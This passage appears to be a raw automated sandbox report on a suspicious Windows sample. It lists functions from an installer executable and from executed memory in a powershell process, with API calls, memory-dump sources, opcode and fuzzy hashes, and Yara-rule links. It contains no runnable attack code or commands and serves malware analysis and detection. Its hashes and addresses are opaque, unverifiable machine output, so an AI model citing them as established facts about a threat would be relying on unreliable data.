                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-4083868402
                                                              • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                              • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                              • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                              • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                              Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 0040269A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp$C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll
                                                              • API String ID: 1659193697-3977306812
                                                              • Opcode ID: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                                              • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                                              • Opcode Fuzzy Hash: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                                              • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                                              Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                              • GetTickCount.KERNEL32 ref: 0040304F
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                              • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                              • String ID:
                                                              • API String ID: 2102729457-0
                                                              • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                              • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                              • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                              • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                              Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0040557F
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                              • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                              • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                              • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                              Function 6FF61948 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharNextExA.USER32(?,0000000A,00000000,6FF630B8,?,6FF616EA,?,00000002,00000002,0000000A), ref: 6FF61974
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                              • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: CharNext
                                                              • String ID: $
                                                              • API String ID: 3213498283-227171996
                                                              • Opcode ID: 9c20e8890f8ccf62c26dd374a6dfca474335157b1eeb9c1959044676b045daab
                                                              • Instruction ID: dff2a9ae99b4bdd6c4c64f0b405e930073f51688cf4a36551160415d2f5a650f
                                                              • Opcode Fuzzy Hash: 9c20e8890f8ccf62c26dd374a6dfca474335157b1eeb9c1959044676b045daab
                                                              • Instruction Fuzzy Hash: 63F01C311183CA9ADF11CF54C824BEA7FA9AF15644F540458FD908B282CB75E629CBA1
                                                              Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,75573420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                              • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 1100898210-4083868402
                                                              • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                              • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                              • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                              • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                              Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 00405E78
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 00405E88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-1876063424
                                                              • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                              • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                                              • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                              • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                                              Function 6FF61A61 Relevance: 5.0, APIs: 4, Instructions: 45stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,7556F360,00000000,00000000,?,?,6FF61295,00000000,/TIMEOUT=,00000000), ref: 6FF61A71
                                                              • lstrlenW.KERNEL32(?,?,?,6FF61295,00000000,/TIMEOUT=,00000000), ref: 6FF61A7C
                                                              • lstrcmpiW.KERNEL32(?,?,?,?,6FF61295,00000000,/TIMEOUT=,00000000), ref: 6FF61A9A
                                                              • lstrlenW.KERNEL32(00000000,?,?,6FF61295,00000000,/TIMEOUT=,00000000), ref: 6FF61AB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                              • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcmpi
                                                              • String ID:
                                                              • API String ID: 1808961391-0
                                                              • Opcode ID: 8f2b0ac81324d8c887789aa71978c0a759866a2092f5b5c70d7dbc1b8c98b5e6
                                                              • Instruction ID: 598e5cf4dbc9a86615c4d5659826ab4ab2d815ef8cdb94f56f118097fe497ae8
                                                              • Opcode Fuzzy Hash: 8f2b0ac81324d8c887789aa71978c0a759866a2092f5b5c70d7dbc1b8c98b5e6
                                                              • Instruction Fuzzy Hash: 5F018136200518BFDB11DFA9DC80D9D77E8EF467A071140AAF904DB221DB70EA41DBA4
                                                              Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                              • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                              • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                              • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                              • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

                                                              Executed Functions

                                                              Function 0775C80E Relevance: 1.9, Instructions: 1853COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 056cd9a2c46d4e966949b1efaf8d86511d06cfbca49b4062ec403044855cb36e
                                                              • Instruction ID: 3e61f6a63ea10b0a96f171642f4286735d3642472a81afc960e3323209162ba0
                                                              • Opcode Fuzzy Hash: 056cd9a2c46d4e966949b1efaf8d86511d06cfbca49b4062ec403044855cb36e
                                                              • Instruction Fuzzy Hash: 77035EB4A00215DFEB60DF64C850BEAB7B2BF8A304F1084A9D8196B754CB71ED82CF51
                                                              Function 04C0EBD8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vvk
                                                              • API String ID: 0-1806392228
                                                              • Opcode ID: 47fb10a9526470d82201c3193b298def3c774bd0f50eda7e68af6533ef0c113f
                                                              • Instruction ID: 3038db6dd748a852772867586c9b56a7f08b9843737992c4c62c2cba0c454209
                                                              • Opcode Fuzzy Hash: 47fb10a9526470d82201c3193b298def3c774bd0f50eda7e68af6533ef0c113f
                                                              • Instruction Fuzzy Hash: 7EB15C70E40219CFDF14CFA9D8857ADBBF2EF88704F14C929E815A7294EB35A941CB81
                                                              Function 04C0F4A8 Relevance: .3, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8c8bd60eeca143c4dffbaa3e944354a2d060282cfd467c3b97eff80e46c8aa55
                                                              • Instruction ID: f144715b1190c0fc04cebaa96e131c0bf8de2734dd7693fe969ed27698061c6d
                                                              • Opcode Fuzzy Hash: 8c8bd60eeca143c4dffbaa3e944354a2d060282cfd467c3b97eff80e46c8aa55
                                                              • Instruction Fuzzy Hash: EBB14F70E00209CFDB24CFA9D89579DBBF2AF88714F14C52DD415E7294EBB4A985CB81
                                                              Function 04C0B0E8 Relevance: 6.8, Strings: 5, Instructions: 520COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8Nvk$h]vk$h]vk$h]vk$Ivk
                                                              • API String ID: 0-457104239
                                                              • Opcode ID: 2a7ea63bcfa93246285ca2cb0ed9fd37c0ecafe7383f085cd772bc361ccba030
                                                              • Instruction ID: 88bdfcd66b2ddd7523f0ea2eb6f15b7166fe5323cf91ef328ecae1d6e3d5c7ca
                                                              • Opcode Fuzzy Hash: 2a7ea63bcfa93246285ca2cb0ed9fd37c0ecafe7383f085cd772bc361ccba030
                                                              • Instruction Fuzzy Hash: C7226234B002148FDB29DB64C9547ADB7B6BF89305F1484A9D409AB390DF35AE86CF85
                                                              Function 04C0F220 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vvk$\Vvk
                                                              • API String ID: 0-1912818553
                                                              • Opcode ID: 549991ee21c6a7f68c536d8b7e611518edf36dace75b6ac42f506cb6e874a46b
                                                              • Instruction ID: a3e5083f0a648abeee43356b1e0859c1fbb31ee46d74c9c4491daa5fdf9a95ae
                                                              • Opcode Fuzzy Hash: 549991ee21c6a7f68c536d8b7e611518edf36dace75b6ac42f506cb6e874a46b
                                                              • Instruction Fuzzy Hash: C9714070E002099FDF24DFA9D8407AEBBF2AF88714F14C12DD815A7294DB74A985CB91
                                                              Function 04C0F21C Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vvk$\Vvk
                                                              • API String ID: 0-1912818553
                                                              • Opcode ID: 82ce0c1c75efc5ae056bc09fbe3ad673780396baef4702cf0543bdb0144670d7
                                                              • Instruction ID: d6d6513dc8c48029153e3cfc55504999a06f5dece596d88bbc39100c2bfe7207
                                                              • Opcode Fuzzy Hash: 82ce0c1c75efc5ae056bc09fbe3ad673780396baef4702cf0543bdb0144670d7
                                                              • Instruction Fuzzy Hash: 44714E70E002099FDF24DFA9D84579DBBF2AF88714F14C129D815A7290DBB4A985CF91
                                                              Function 04C0BDA0 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h]vk$Ivk
                                                              • API String ID: 0-3194200174
                                                              • Opcode ID: 3ec9ab4ad60e6af6c1cbf1a5dd4cec3a78baa3e34ad96e8fe4ba5dd15cb074aa
                                                              • Instruction ID: 9bd6c3e6b28932d3e856c610800f29f602cae7d320fdf143713fb4eb75f20a46
                                                              • Opcode Fuzzy Hash: 3ec9ab4ad60e6af6c1cbf1a5dd4cec3a78baa3e34ad96e8fe4ba5dd15cb074aa
                                                              • Instruction Fuzzy Hash: B6315030B012188FCB25DB64C9946EEB7B2AF89345F1084E9D409AB351DB35EE86DF81
                                                              Function 04C0EBCC Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2207728476.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \Vvk
                                                              • API String ID: 0-1806392228
                                                              • Opcode ID: 488f1d1dc882e0b1cc84a30a9d910ba2cafe73509a7c9c4fea6e3fbdd10eeb72
                                                              • Instruction ID: be867c822a4ad9fb6ffd6fd613533c822fc11dbdf40313c04e838c8f6194f607
                                                              • Opcode Fuzzy Hash: 488f1d1dc882e0b1cc84a30a9d910ba2cafe73509a7c9c4fea6e3fbdd10eeb72
                                                              • Instruction Fuzzy Hash: 34B17D70E40219CFDF14CFA9D88579DBBF2EF88714F14C929E815A7290EB35A941CB81
                                                              Function 07753130 Relevance: 1.4, Instructions: 1370COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96338605cb7029f79e0bd70c6665a06abe0fd2f022bfa27a654b3d02eae5ec9b
                                                              • Instruction ID: fe52f2fb68541eb374c09ef0a44c3eb436797cc53ab13d3914ab385bd564a30a
                                                              • Opcode Fuzzy Hash: 96338605cb7029f79e0bd70c6665a06abe0fd2f022bfa27a654b3d02eae5ec9b
                                                              • Instruction Fuzzy Hash: 0FC2A4B4B00205DFE714DFA8C840BAABBB2FB89344F208559D9156F796CB72DD42CB91
                                                              Function 0775D5EE Relevance: 1.2, Instructions: 1234COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2214506960.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7750000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daddc53f357fff58fe02820565168d3c140ef291b87343248917803dd3bb173d
                                                              • Instruction ID: c6f230cc6218ec7be0cfb63457826a4a56e1c9fe10ea9e8d2bc09a6c4538cd82
